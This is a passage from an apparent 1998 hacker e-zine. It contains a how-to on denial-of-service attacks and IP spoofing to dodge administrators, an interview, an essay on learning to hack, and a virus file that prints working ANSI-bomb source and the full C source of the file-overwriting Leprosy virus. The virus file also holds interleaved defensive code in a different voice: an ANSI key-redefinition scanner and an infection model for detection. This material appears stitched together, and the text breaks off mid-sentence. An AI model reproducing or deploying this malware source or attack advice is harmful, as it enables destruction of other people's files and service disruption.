There is no real way of securing a server from this type of attack. The problem lies in the fact that the SYN - ACK connection is a necessary protocol for a net server. Without it, it would be severely restricted in its on-line transactions. But by restricting the number of possible connections at any one time, you drastically reduce the chance of there being a problem.

*Unique Attacks

There are certain services that are available only on specific servers that you may need to attack. If the service is unique enough you may have some difficulty actually attacking it. One example is the services.dal.net server. It runs the services that are provided for the DalNet IRC network. ChanServ, MemoServ and NickServ are very unique services that are run from this server. These services can be accessed from anywhere on the DalNet IRC network. Hundreds of connections are consistently connected to DalNet and all these people are using the DalNet services repeatedly. To take over an IRC channel on DalNet you might want to shut down ChanServ. To do that you would need to research the service and find a hole in it that you can exploit. You may be able to research a little to find software similar to it that has some exploits already documented.

*IP Spoofing

Most DoS attacks are run from your own computer. Unless you want a pesky system administrator ringing you the next day, you will need to find some way to hide your location from the target computer that you are attacking. IP spoofing is the hardest thing that can be done these days in the world of hacking. There are several ways to hide your location from the log files on a target computer. Some are more appropriate than others because of their advantages and disadvantages.

Wingating is the most widely used bounce technique. It involves connecting to a computer that is running the Wingate program, so you can then bounce off that computer and route your connection to another computer. This isn't really a choice for DoS attacks, because these attacks usually rely on speed. Wingate systems are slow and lagged on their own, and your added connection won't help.

IP packet spoofing is the next possibility. It involves creating an attack that actually sends packets of data that spoof the original IP address. This can't be achieved in a Windows environment, because Windows controls too much of the net interface. It is much easier to accomplish on a UNIX machine, as when you are programming you can have access to the raw sockets. As you can specify exactly what you want to send to the network output, you can choose exactly the information to send out. You can even send a specific IP address that you wish the packets to seem to come from.

*Making Your Attack

All you need to make a successful attack is a little information on the server. You should probably try to log onto the server as a Guest account and try to gain as much information as you can. You will need to have the operating system information and a list of the software running internally or on the ports of the server. Search for techniques to exploit the server and its software. Once you have the necessary information or utilities you can attack the server.

You will probably want to choose a time for the attack that would be good for your net connection. A time that your ISP won't be too bogged down with connections. Also a time that the net won't be flooded with users. The more relaxed the Internet is, the faster your connection will be and the faster your attack will go. You need to select a time that will allow you to have enough time on-line to complete the attack and go ahead with whatever you intend to do after the server drops.

*Research

There are lots of websites that discuss server exploits and software holes. You can search for information on the software and you should be able to find the necessary techniques and information for attacking the server. Here are a few:

  · http://www.rootshell.com
  · http://www.cdc.com
  · http://www.warforge.com

Also check out my site http://homepages.iol.ie/~cronus for updates.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 7 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Interview with Neonsurge:

What are your main underground interests ?

NeonSurge : WindowsNT Security (anything affecting Microsoft Products really). New Crypto mechanisms are always of interest.
And corporate espionage and sabotage is neat.

How long have you been involved in that activity ?

NeonSurge : Since 1984

How did you get involved in the net underground ?

NeonSurge : That's a really long story. It started locally for me in my hometown a long time ago. At the time, the net wasn't really much... Everything was text based and not as pretty (that's a joke). At the time private BBS and VMBs were the big thing. You would get updates as to the new shit to try via listening to other people's VMBs. At that time my stomping ground was SprintNet (x.25). From there it was a natural progression to what I do today I suppose.

How did you learn ?

NeonSurge : Reading. Playing. Reading. Reading. Reading. Playing.

What advice would you have for a beginner in the underground ?

NeonSurge : See Above.

Do you feel that the underground community has evolved in a good or bad way ?

NeonSurge : For the most part I think it has evolved in a bad way. No one really shares information anymore, which is a sad thing. The only good way in which the scene has evolved is the availability of the information that is shared.

Do you wish to publicly admit any criminal activities relating to the net ?

NeonSurge : No. Not at this time, thanks...

Is there anything you would like to pass on to the net community ?

NeonSurge : Don't be stupid. Don't be afraid to learn new technologies, Unix and Linux are not everything.

Do you have anything you would like to add ? A quote perhaps ?

NeonSurge : Don't eat the big white mints.

Contact Information ?

neonsurge@hotmail.com
http://rhino9.ml.org

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 8 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Mixed Up Underground:

Hacking as we know it is very mixed up. There are so many people trying to be hackers [I'm going to refrain from the word wannabe] that only some make it to that goal. The rest get lost somewhere in the void between. The best way to stop hacking is never to start. Hacking isn't a bad thing. But it's a commitment. Like having a family or something.

My best advice to newbies is not to try to learn how to "hack". I suggest learning about computers. Have fun with them. Set up a network. Use Windows for all I care. For all anyone cares. Those who say the first step to becoming a hacker is setting up Linux are stupid. They should be thrown out to the dogs. Most newbies don't even know what UNIX is, and trying to explain that Linux is a version of UNIX written by Linus Torvalds, originally from a modified form of Minix, and that it runs on Intel based home computers with a partition which allows multiple operating systems is pushing it. Woah. If a newbie understands that then they should go work for NASA and help return our glorious urge for space exploration back to what it used to be.

In my opinion, if a person feels the need to become a hacker or push their computer to the extreme then they should do just that. Push their COMPUTER to the extreme. Not rack their brains for hours on end and eventually wind up in that void I talked about earlier. Hacking is about getting into computers...hmm..so if you know a lot about your own computer then maybe...just maybe it makes it possible for you to get into another computer. There's a thought. Then you don't have to read all those hyped technical manuals that you get bored reading. Instead you can have fun and do things. Sounds better to me.

This is not a guide on "how to hack" if you don't already know. I plan to write a page about how the hacking society has turned into something like the US Government, which hackers supposedly dislike. Why? Because it's corrupt and power-hungry. In the end all things made by humans or used by humans or organised by humans turn into something like that. So forget listening to others. Do things your way. If you don't want to read this text or that or set up Linux, then don't. There are no requirements for being a hacker. If there were then I'm sure that the hacker society would go form a new country and label it "copy of the US Gov." But no. It hasn't got that bad yet. So learn while you can. Maybe it will help you out in life. Or maybe you will end up in the cage with murderers and rapists. I dunno. Would that be fun? That's what happens if you try too hard to learn too fast. So back to the original idea of just losing the generally thought idea of how to hack and just learning computers.

If you really want some quick tips on becoming a hacker in non-conventional ways then here they are. Get like 2 or 3 computers. Windows is fine. They can be cheap ones. Then read up on networking. Maybe set up a TCP-IP network between these three computers. Then access one of these other computers from DOS. Well good. You have knowledge of TCP-IP [the basis of the internet], DOS [how many million lines of UNIX code are in DOS??], and some lovely problem solving skills. There. You know some good stuff now! Maybe you want to add to your home network. Add some interesting things here and there and try them out. You can learn more every day. Maybe you want to try to put a Macintosh on your network. Hmm...Read up on it. Talk to some people. Once you have that then you are quite knowledgeable! What next? Maybe some UNIX variants. By now you have heard about it. The free operating system [Linux] which you can put on an old 486 and hook up to your network too. There. Unix, Mac, TCP-IP, Windows, Problem Solving, Hardware skills. All lumped together. Then maybe, just maybe you want to host your very own networking help website on your very own network. Set up a server, and get a domain name and configure, configure, configure. That definitely adds to your knowledge! Fun. Now you know a whole bunch about hacking [you didn't even know it?] without having to go to ONE site with those flaming skulls. Good for you.

I hope this text has made you think. It sure made me. All my ideas and anger on paper [what SHOULD I call it?] and enough information to get you in action. I haven't said once that you have to do anything. And you don't. Just go your own route. The network I talked about WOULD help you out. And it would be fun to build [and have]. So make your own decisions and keep thinking!

-Digital Avatar 9.23.98

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 9 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Virii--Shit:

A Virus Information Text File By Kleptic

CREDITS:
-------------------------------------------------------------
Author............................................Kleptic
Editor............................................Kleptic
Ideas, Source, Examples Supplied By...............Kleptic
Facts Stolen From Several Sources By..............Kleptic
-------------------------------------------------------------

Introduction:

Welcome to my really long text file on virus information and safety. I have always had a fascination with computer virii, since I first heard the word. I, like a lot of people, had no idea what they were about, and was extremely curious. This text file will cover my process as I find out more about them: how they are written, why they act like they do, and if possible, why people would write them.

In This File:

  Prevention And Protection Methods
  The "Internet Worm"
  Trojans, Worms, Virii, Ansi Bombs: What's the difference?
  Benign VS Malignant Virii
  Sample Source Code Of Virii
  Discussion Of The Infection And Encryption Methods Used By "Leprosy"
  The "Uncompress" Virus
  "Suicidal Tendencies" Department/Virus Of The Month
  Discussion Of Anti Viral Software
  Things You Should Know

-----------------------------------------------------------------------------
Prevention And Protection Methods:
-----------------------------------------------------------------------------

After the infamous "Michelangelo" panic, I realised what the masses are lacking is virus literacy. If people had an understanding of them, and knew the appropriate methods of prevention and of dealing with an infection, the situation would never have been blown out of proportion like it was. When I hear people ask questions such as "If I Put My Toothbrush Near An Infected Disk, Will I Catch The Virus When I Brush My Teeth?" I have to laugh...Ok, maybe that example is a little exaggerated, but some of the questions are hitting close to that level of stupidity, so here are some protection and prevention methods:

1. If you download a file from a public BBS, or a friend gives you a file that he downloaded from somewhere, be sure to uncompress the file onto a floppy and run your virus scanner on it. NEVER run a new file without checking it first. Some people believe a virus scanner can spot an infected file inside a compressed file by running the virus scanner on the archive; this is NOT true. You have to decompress the file first. By doing this, you are dropping your chances of infection considerably, BUT there is always the chance of an unknown virus that the scanner won't spot, so that is why you have to ALWAYS have a backup of all your data on tape or disk. That way if the unknown virus wipes your hard drive, you have the backup and nothing is lost.

2. In the event of a virus infection, shut your computer off immediately and wait 10-20 seconds. NEVER do a "warm boot" (CTRL-ALT-DEL) because some virii can survive through a warm boot. Always do a "cold boot" (shut the computer OFF). After the 10-20 seconds, boot your computer from a CLEAN, WRITE PROTECTED DOS bootable disk, and then run your virus scanner from a WRITE PROTECTED disk. (The reason for having the disks write protected is just in case the virus is still lurking around; it won't be able to write itself out and infect the floppies.) If the virus is a known one, have the virus scanner either fix the infected files, or delete them (and replace them from your backup), or make a note of the infected files and erase them manually.

3. How do you spot an attack by an unknown virus?

   A) Change in sizes of files
   B) Change of file dates/times
   C) Deleted files
   D) Slower processing time
   E) Unusual messages
   F) Disk activity, more than usual (writing to the disk when it's not necessary)

4. What to do in the event of an unknown virus attack?

   A) Follow the steps of shutting the machine off and re-booting as outlined in #2.
   B) Run your virus scanner and have it look for files that changed in size or date (if your scanner has a feature that makes note of original file sizes/dates/times).
   C) If your virus scanner doesn't make note of original sizes/dates/times you can always make note of them manually and then check them yourself. It's time consuming, but can prevent serious damage to your data, and you should try to isolate an infected file and send it to ME (info on how to get it to me at the end of the newsletter) so I can attempt to dissect it and notify the appropriate person of the new virus.
   D) Some virus scanners come with a TSR that will prevent any writing to disk; it will pop a window or message on the screen saying:

        Attempting to write to
        Do you wish to do so?

      If something is trying to write to a file that shouldn't be written to at that time, chances are you are dealing with an unknown virus and should say no. Then try to find and isolate the virus.
   E) How do you spot an unknown virus or a known virus without running a virus scanner?

      1) Most virii are tiny (2 kilobytes to 10 kilobytes) and the majority of them are .COM files, so if you have, let's say, a 6K .COM file that claims to be an "awesome game" I'd be a little bit suspicious.
      2) Weird names. I would not run "DIE.COM" or "KILLER.COM", and over the years I have run into files named that, when people tried to infect my computer. At least they could've named it something else not so obvious.
      3) As stated in #1, the MAJORITY of them are small .COM files, but they can be .EXE files as well, and bigger than 10K.

All it takes is a little bit of common sense, and 99% of what could've been virus attacks on your computer can be prevented. All you have to remember is that they cannot infect your machine unless run first...BUT there is one virus out there that, when uncompressed, activates itself. This virus does NOT have to be executed in order to infect your machine, and it will be discussed later on. In the event that this "uncompress" virus, or any other virus, wipes some of your data, that's what backups are for. ALWAYS HAVE A BACKUP OF YOUR HARD DRIVE, and NEVER put a floppy in the drive and run a program when there is a virus in memory because, chances are, that floppy will get ruined/infected as well, unless it is write protected. The instant you are aware of an infection, shut the machine off! Because there are some virii that, upon finding a write protected floppy that they cannot infect, or something else they can't do, "get mad" and cause destruction.

-----------------------------------------------------------------------------
The "Internet Worm"
-----------------------------------------------------------------------------

This has to be the most widely publicised case of a virus attack ever. On 10/02/88, Robert Morris, a graduate student, wrote and released a worm that infected "Internet", the world-wide network. Within hours, it infected thousands of computers. The worm was benign, not causing any damage to files or media, but replicated itself over and over rapidly, and resulted in the computers on Internet having to be shut down and all copies of the worm removed. Some of the hosts were still disconnected from the network eight days later, showing the impact this worm had. Morris claimed he did it as an experiment, and made a mistake in how fast it actually would replicate. The media, namely the NY Times, USA Today, and The Wall Street Journal, gave the worm front page coverage. On November 4th, teams at several institutions went to work and successfully "decompiled" the worm and studied it in the language it was written in, "C language", but the source code was never released for fear of hackers using the source for malicious purposes. In the end, Morris was removed from school, ordered to pay $10,000 in fines, perform 400 hours of community service and was on 3 years probation. Some people argued as to whether or not Morris was guilty because he evidently didn't do it to cause damage, but rather as an experiment that went wrong.

What the worm did: It hacked its way into hosts attached to the Internet by cracking passwords and then replicated itself rapidly, taking up all the memory and forcing the hosts to be shut down.

-----------------------------------------------------------------------------
Trojans, Worms, Virii, Ansi Bombs: What's the difference?
-----------------------------------------------------------------------------

Trojans: Programs disguised as a useful program or an existing real program that can cause damage on your system.

Worms: Benign virii, rarely causing damage to media or files, such as the Internet worm.

Ansi Bombs: Tiny programs that use ANSI to remap your keyboard, causing keys, when pressed, to do other things. Example: If an Ansi bomb was in memory, and it remapped the "K" key to erase all the files in the current directory, as soon as you pressed K the files would be gone. Usually when you type

  C>ERASE *.*

MS-DOS will respond with:

  All the files in the current directory will be deleted!
  Are you sure (y/n)?

Some Ansi bombs are intelligent and can prevent such DOS messages from appearing.

-----------------------------------------------------------------------------
Here is the source code to a simple Ansi bomb:
-----------------------------------------------------------------------------

#include <stdio.h>

#define KILL(K, S) printf("\033[0;%d;\"%s\";13p", K, S)

#define F1 59
#define F2 60
#define F3 61
#define F4 62

main()
{
  KILL(F1, "DEL *.ZIP");
  KILL(F2, "DEL *.ARJ");
  KILL(F3, "DEL *.COM");
  KILL(F4, "DEL *.EXE");
}

-----------------------------------------------------------------------------

This just assigns the string (DEL *.ZIP etc.) to the respective keys. If this Ansi bomb was in memory, and you pressed F1, it would delete all the files in the current directory with the extension .ZIP. The command (DEL *.ZIP) would appear on the screen though, and you could use a file recovery program to recover the deleted files. There are more lethal Ansi bombs, ones that can format your hard drive and other such destructive acts.

Prevention: Use NANSI or ZANSI rather than ANSI and the Ansi bombs won't work.

-----------------------------------------------------------------------------

Virii: Destructive programs that use 'stealth' techniques, and can replicate. Not all virii are destructive; some can be benign, and just pop up annoying messages from time to time or slow down system speed.

-----------------------------------------------------------------------------

No more will be discussed of ANSI Bombs or Trojans as this newsletter is dedicated entirely to virii.

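
Beyond swapping in NANSI or ZANSI, a downloaded text or .ANS file can be checked for this kind of key redefinition before ANSI.SYS ever sees it. Here is an added example (not part of Kleptic's file): a Python scanner that pulls every ESC [ ... p sequence out of a file and reports which key is redefined and what it would type. The sample input is constructed and includes the F1/F2 sequences the bomb above emits; scan codes 59-62 are F1-F4 as in the bomb's #defines, and the F5-F12 entries are the standard IBM PC scan codes added here.

```python
"""Scan a text/.ANS file for ANSI.SYS keyboard-redefinition sequences.

Added example, not part of the original file. An ANSI bomb is just the
sequence ESC [ <key> ; "<string>" ; 13 p: pressing <key> types <string>
followed by Enter. Colour and cursor sequences end in other final bytes
(m, H, J, K, ...) and are harmless, so only a final 'p' is reported.
"""
ESC = "\x1b"

# Extended keys arrive as "0;<scancode>". 59-62 are F1-F4 as in the bomb's
# #defines; the rest are the standard IBM PC scan codes for F5-F12.
SCANCODE_NAMES = {59: "F1", 60: "F2", 61: "F3", 62: "F4", 63: "F5", 64: "F6",
                  65: "F7", 66: "F8", 67: "F9", 68: "F10", 133: "F11", 134: "F12"}

# Constructed sample: a harmless colour banner, the two F-key bombs from the
# text (one with a ';' hidden inside the quotes), a plain-key bomb on 'K'
# (ASCII 75), then clear-screen and home-cursor codes.
SAMPLE_ANS = (
    "\x1b[0;1;31mREADME.ANS - colour banner\x1b[0m\r\n"
    "\x1b[0;59;\"DEL *.ZIP\";13p"
    "\x1b[0;60;\"ECHO Y;DEL *.ARJ\";13p"
    "\x1b[75;\"DEL *.*\";13p"
    "\x1b[2J\x1b[1;1HEnjoy the picture!\r\n"
)


def split_params(body):
    """Split the parameter list on ';' without breaking quoted strings."""
    parts, cur, quote = [], "", None
    for ch in body:
        if quote:
            cur += ch
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            cur += ch
        elif ch == ";":
            parts.append(cur)
            cur = ""
        else:
            cur += ch
    parts.append(cur)
    return parts


def render(params):
    """Show what the redefinition would type: quoted text verbatim, codes as <n>."""
    out = []
    for p in params:
        p = p.strip()
        if len(p) >= 2 and p[0] in "\"'" and p[-1] == p[0]:
            out.append(p[1:-1])
        elif p.isdigit():
            out.append("<%d>" % int(p))
    return "".join(out)


def find_key_redefinitions(data):
    """Return [(key, typed_text)] for every ESC [ ... p sequence in data."""
    hits, pos = [], 0
    while True:
        start = data.find(ESC + "[", pos)
        if start < 0:
            return hits
        # Walk to the final byte (0x40-0x7e); quoted strings may hold anything.
        i, quote = start + 2, None
        while i < len(data):
            ch = data[i]
            if quote:
                if ch == quote:
                    quote = None
            elif ch in "\"'":
                quote = ch
            elif "@" <= ch <= "~":
                break
            i += 1
        if i >= len(data):
            return hits                       # unterminated sequence: stop
        pos = i + 1
        if data[i] != "p":
            continue                          # colour/cursor code, not a redefinition
        params = [p.strip() for p in split_params(data[start + 2:i])]
        if len(params) > 1 and params[0] == "0" and params[1].isdigit():
            code = int(params[1])             # extended key: 0;<scancode>
            key, rest = SCANCODE_NAMES.get(code, "scancode %d" % code), params[2:]
        elif params and params[0].isdigit():
            key, rest = chr(int(params[0])), params[1:]   # plain ASCII key code
        elif params and len(params[0]) >= 2 and params[0][0] in "\"'":
            key, rest = params[0][1:-1], params[1:]       # key given as "k"
        else:
            key, rest = "?", params
        hits.append((key, render(rest)))


if __name__ == "__main__":
    for key, typed in find_key_redefinitions(SAMPLE_ANS):
        print("%-8s -> %r" % (key, typed))
```

Any hit at all in a file that is supposed to be a picture or a README is reason enough not to TYPE it with ANSI.SYS loaded.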
----------------------------------------------------------------------------- Benign VS Malignant Virii: ----------------------------------------------------------------------------- Benign Virii do not cause damage but do things such as take up all the memory, slow processing speed down, and send annoying messages to the console, or the printer, etc... Malignant, or Malicious, Virii cause actual destruction, deleting files, destroying the FAT or boot sector, locking up the computer, formatting disks or hard drives, etc... ----------------------------------------------------------------------------- Virus Source Code: ----------------------------------------------------------------------------- Now for the real thing, we will start with the C Language source code to the "Leprosy" Virus. ----------------------------------------------------------------------------- #pragma inline #define CRLF "\x17\x14" /* CR/LF combo encrypted. */ #define NO_MATCH 0x12 /* No match in wildcard search. */ char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." }; struct _dta /* Disk Transfer Area format for find. */ { char findnext[21]; char attribute; int timestamp; int datestamp; long filesize; char filename[13]; } *dta = (struct _dta *) 0x80; /* Set it to default DTA. */ const char filler[] = "XX"; /* Pad file length to 666 bytes. */ const char *codestart = (char *) 0x100; /* Memory where virus code begins. */ const int virus_size = 666; /* The size in bytes of the virus code. */ const int infection_rate = 4; /* How many files to infect per run. */ char compare_buf[20]; /* Load program here to test infection. */ int handle; /* The current file handle being used. */ int datestamp, timestamp; /* Store original date and time here. 
*/ char diseased_count = 0; /* How many infected files found so far. */ char success = 0; /* How many infected this run. */ /* The following are function prototypes, in keeping with ANSI */ /* Standard C, for the support functions of this program. */ int find_first( char *fn ); int find_healthy( void ); int find_next( void ); int healthy( void ); void infect( void ); void close_handle( void ); void open_handle( char *fn ); void print_s( char *s ); void restore_timestamp( void ); /*----------------------------------*/ /* M A I N P R O G R A M */ /*----------------------------------*/ int main( void ) { int x = 0; do { if ( find_healthy() ) { /* Is there an un-infected file? */ infect(); /* Well, then infect it! */ x++; /* Add one to the counter. */ success++; /* Carve a notch in our belt. */ } else { /* If there ain't a file here... */ _DX = (int) ".."; /* See if we can step back to */ _AH = 0x3b; /* the parent directory, and try */ asm int 21H; /* there. */ x++; /* Increment the counter anyway, to */ } /* avoid infinite loops. */ } while( x < infection_rate ); /* Do this until we've had enough. */ if ( success ) /* If we got something this time, */ print_s( fake_msg ); /* feed 'em the phony error line. */ else if ( diseased_count > 6 ) /* If we found 6+ infected files */ for( x = 0; x < 3; x++ ) /* along the way, laugh!! */ print_s( virus_msg[x] ); else print_s( fake_msg ); /* Otherwise, keep a low profile. */ return; } void infect( void ) { _DX = (int) dta->filename; /* DX register points to filename. */ _CX = 0x00; /* No attribute flags are set. */ _AL = 0x01; /* Use Set Attribute sub-function. */ _AH = 0x43; /* Assure access to write file. */ asm int 21H; /* Call DOS interrupt. */ open_handle( dta->filename ); /* Re-open the healthy file. */ _BX = handle; /* BX register holds handle. */ _CX = virus_size; /* Number of bytes to write. */ _DX = (int) codestart; /* Write program code. */ _AH = 0x40; /* Set up and call DOS. 
*/
    asm int 21H;
    restore_timestamp();               /* Keep original date & time. */
    close_handle();                    /* Close file. */
    return;
}

int find_healthy( void )
{
    if ( find_first("*.EXE") != NO_MATCH )      /* Find EXE? */
        if ( healthy() )                        /* If it's healthy, OK! */
            return 1;
        else
            while ( find_next() != NO_MATCH )   /* Try a few more otherwise. */
                if ( healthy() )
                    return 1;                   /* If you find one, great! */
    if ( find_first("*.COM") != NO_MATCH )      /* Find COM? */
        if ( healthy() )                        /* If it's healthy, OK! */
            return 1;
        else
            while ( find_next() != NO_MATCH )   /* Try a few more otherwise. */
                if ( healthy() )
                    return 1;                   /* If you find one, great! */
    return 0;                                   /* Otherwise, say so. */
}

int healthy( void )
{
    int i;

    datestamp = dta->datestamp;        /* Save time & date for later. */
    timestamp = dta->timestamp;
    open_handle( dta->filename );      /* Open last file located. */
    _BX = handle;                      /* BX holds current file handle. */
    _CX = 20;                          /* We only want a few bytes. */
    _DX = (int) compare_buf;           /* DX points to the scratch buffer. */
    _AH = 0x3f;                        /* Read in file for comparison. */
    asm int 21H;
    restore_timestamp();               /* Keep original date & time. */
    close_handle();                    /* Close the file. */
    for ( i = 0; i < 20; i++ )         /* Compare to virus code. */
        if ( compare_buf[i] != *(codestart+i) )
            return 1;                  /* If no match, return healthy. */
    diseased_count++;                  /* Chalk up one more fucked file. */
    return 0;                          /* Otherwise, return infected. */
}

void restore_timestamp( void )
{
    _AL = 0x01;                        /* Keep original date & time. */
    _BX = handle;                      /* Same file handle. */
    _CX = timestamp;                   /* Get time & date from DTA. */
    _DX = datestamp;
    _AH = 0x57;                        /* Do DOS service. */
    asm int 21H;
    return;
}

void print_s( char *s )
{
    char *p = s;

    while ( *p ) {                     /* Subtract 10 from every character. */
        *p -= 10;
        p++;
    }
    _DX = (int) s;                     /* Set DX to point to adjusted string. */
    _AH = 0x09;                        /* Set DOS function number. */
    asm int 21H;                       /* Call DOS interrupt. */
    return;
}

int find_first( char *fn )
{
    _DX = (int) fn;                    /* Point DX to the file name. */
    _CX = 0xff;                        /* Search for all attributes. */
    _AH = 0x4e;                        /* 'Find first' DOS service. */
    asm int 21H;                       /* Go, DOS, go. */
    return _AX;                        /* Return possible error code. */
}

int find_next( void )
{
    _AH = 0x4f;                        /* 'Find next' function. */
    asm int 21H;                       /* Call DOS. */
    return _AX;                        /* Return any error code. */
}

void open_handle( char *fn )
{
    _DX = (int) fn;                    /* Point DX to the filename. */
    _AL = 0x02;                        /* Always open for both read & write. */
    _AH = 0x3d;                        /* "Open handle" service. */
    asm int 21H;                       /* Call DOS. */
    handle = _AX;                      /* Assume handle returned OK. */
    return;
}

void close_handle( void )
{
    _BX = handle;                      /* Load BX register w/current file handle. */
    _AH = 0x3e;                        /* Set up and call DOS service. */
    asm int 21H;
    return;
}

-----------------------------------------------------------------------------

Of the Leprosy source discussed in this text file, the main areas covered
are its encryption technique, how the virus infects files, how it
'replicates' and 'breeds', and how its 'stealth techniques' are implemented
in the code. This issue covers how the virus infects files and how its
strings are encrypted.

-----------------------------------------------------------------------------
Infection Method:
-----------------------------------------------------------------------------

void infect( void )
{
    _DX = (int) dta->filename;         /* DX register points to filename. */
    _CX = 0x00;                        /* No attribute flags are set. */
    _AL = 0x01;                        /* Use Set Attribute sub-function. */
    _AH = 0x43;                        /* Assure access to write file. */
    asm int 21H;                       /* Call DOS interrupt. */
    open_handle( dta->filename );      /* Re-open the healthy file. */
    _BX = handle;                      /* BX register holds handle. */
    _CX = virus_size;                  /* Number of bytes to write. */
    _DX = (int) codestart;             /* Write program code. */
    _AH = 0x40;                        /* Set up and call DOS. */
    asm int 21H;
    restore_timestamp();               /* Keep original date & time. */
    close_handle();                    /* Close file. */
    return;
}

-----------------------------------------------------------------------------

void infect( void ) is just what he named this function.
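Before the register-by-register walk through infect() that follows, here is an added example, not from the Leprosy source or from Kleptic's article: a portable C model of infect() and healthy() that runs without DOS or INT 21H, so the routine's side effects can be checked rather than read off the listing. The host_t and report_t types, the byte pattern standing in for the 666 bytes at codestart, and every helper name are assumptions of this example; only the 666-byte body and the 20-byte comparison come from the listing. It goes a little beyond the listing by running the check over several files the way find_healthy() walks a directory.

```c
/* Added example, not from the Leprosy source or Kleptic's article: an
 * in-memory model of infect() and healthy() that runs without DOS.  host_t,
 * report_t, the byte pattern standing in for the 666 bytes at codestart and
 * every helper name are assumptions of this example; only the 666-byte body
 * and the 20-byte compare come from the listing. */
#include <stdio.h>
#include <string.h>

#define VIRUS_SIZE 666      /* virus_size in the article */
#define SIG_LEN     20      /* bytes healthy() reads and compares */
#define MAX_FILE  4096

/* One file as DOS would see it: contents, size, attribute byte
 * (0x01 RO, 0x02 Hidden, 0x04 System, 0x20 Archive), time/date stamp. */
typedef struct {
    unsigned char data[MAX_FILE];
    size_t size; unsigned attrib; long stamp;
} host_t;

/* What a directory entry shows after infection, plus healthy()'s verdict. */
typedef struct { size_t size; long stamp; unsigned attrib; int detected; } report_t;

/* Constructed stand-in for the virus's own first VIRUS_SIZE bytes. */
static const unsigned char *virus_body(void)
{
    static unsigned char body[VIRUS_SIZE];
    static int ready;
    if (!ready) {
        for (size_t i = 0; i < VIRUS_SIZE; i++)
            body[i] = (unsigned char)(0xE9 + 7 * i);
        ready = 1;
    }
    return body;
}

/* A clean host filled with 0x90, which never matches the body's first byte. */
void make_host(host_t *h, size_t size, unsigned attrib, long stamp)
{
    memset(h->data, 0x90, sizeof h->data);
    h->size = size; h->attrib = attrib; h->stamp = stamp;
}

/* healthy(): 1 unless the first SIG_LEN bytes are the virus's own. */
int host_is_healthy(const host_t *h)
{
    return h->size < SIG_LEN || memcmp(h->data, virus_body(), SIG_LEN) != 0;
}

/* infect(): 43H with CX=0 clears every attribute, 3DH reopens, 40H writes
 * VIRUS_SIZE bytes at offset 0 (no seek), 57H restores the time stamp. */
void infect_host(host_t *h)
{
    h->attrib = 0;                                   /* Archive goes too */
    memcpy(h->data, virus_body(), VIRUS_SIZE);       /* overwrite, not append */
    if (h->size < VIRUS_SIZE) h->size = VIRUS_SIZE;  /* only short hosts grow */
    /* h->stamp untouched: restore_timestamp() puts the original back */
}

/* find_healthy()'s walk turned into a scanner: hosts that fail healthy(). */
size_t count_infected(const host_t *hosts, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        if (!host_is_healthy(&hosts[i])) hits++;
    return hits;
}

/* Infect a read-only, archived host and report what size, stamp, attribute
 * and signature checks see afterwards. */
report_t infect_and_report(size_t host_size)
{
    host_t h;
    report_t r = { 0, 0, 0, 0 };
    make_host(&h, host_size, 0x21, 0x5678);
    if (!host_is_healthy(&h)) return r;              /* clean host expected */
    infect_host(&h);
    r.size = h.size;  r.stamp = h.stamp;  r.attrib = h.attrib;
    r.detected = !host_is_healthy(&h);
    return r;
}

/* Three hosts, two infected: the scanner should report 2. */
size_t demo_scan(void)
{
    host_t dir[3];
    make_host(&dir[0], 2000, 0x20, 1);
    make_host(&dir[1],  300, 0x20, 2);
    make_host(&dir[2], 1500, 0x20, 3);
    infect_host(&dir[0]);
    infect_host(&dir[1]);
    return count_infected(dir, 3);
}

int main(void)
{
    report_t big = infect_and_report(2000), small = infect_and_report(300);
    printf("2000-byte host: now %zu bytes, stamp %lx, attrib %u, detected %d\n",
           big.size, big.stamp, big.attrib, big.detected);
    printf(" 300-byte host: now %zu bytes, detected %d\n", small.size, small.detected);
    printf("scan of 3 hosts finds %zu infected\n", demo_scan());
    return 0;
}
```

Two things fall out of it that matter when hunting for this kind of infection: a host longer than 666 bytes keeps its size and its time stamp, so only the wiped attributes and a prefix signature give it away; and because the virus itself recognises an infected file from its first 20 bytes, a scanner needs nothing more than those bytes of one known sample to do the same job.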
The function returns nothing and takes no parameters, as the two "voids"
say. Register DX points to the filename as declared in the structure "_dta",
which overlays the Disk Transfer Area at offset 0x80 of the program segment
prefix, where the 'find first' and 'find next' calls leave their results:

-----------------------------------------------------------------------------
_dta structure:
-----------------------------------------------------------------------------

struct _dta {
    char findnext[21];
    char attribute;
    int  timestamp;
    int  datestamp;
    long filesize;
    char filename[13];
} *dta = (struct _dta *) 0x80;

-----------------------------------------------------------------------------

Next in the "infect" function, 0x00 is assigned to the CX register. With
function 43H, register CX holds the attribute bits you want the file to
have:

    Bit:    Attribute:
    0       Read Only
    1       Hidden
    2       System
    3-4     Volume label and Directory (cannot be set with 43H)
    5       Archive
    6-15    Reserved

Because the author assigned 0x00 to CX, every attribute is cleared: the
read-only bit that would make the open for write fail, and the hidden,
system and archive bits along with it. Nothing in infect() puts them back,
so an infected file that used to be read-only or hidden comes out plain,
which is one of the few traces the routine leaves.

Next, 0x01 is assigned to register AL, selecting the SET sub-function of
43H (AL = 0 would GET the attributes). Then 0x43 is assigned to AH, the
function number for Get/Set Attributes, and INT 21H is called.

open_handle() then re-opens the file with function 3DH for read and write
and leaves the handle in the global "handle". The current handle is
assigned to register BX. The size of the virus code, the number of bytes to
write, stored in the integer "virus_size", is assigned to register CX;
virus_size is declared and initialised at the beginning of the source code
as an integer with the value 666. DX points at codestart, the start of the
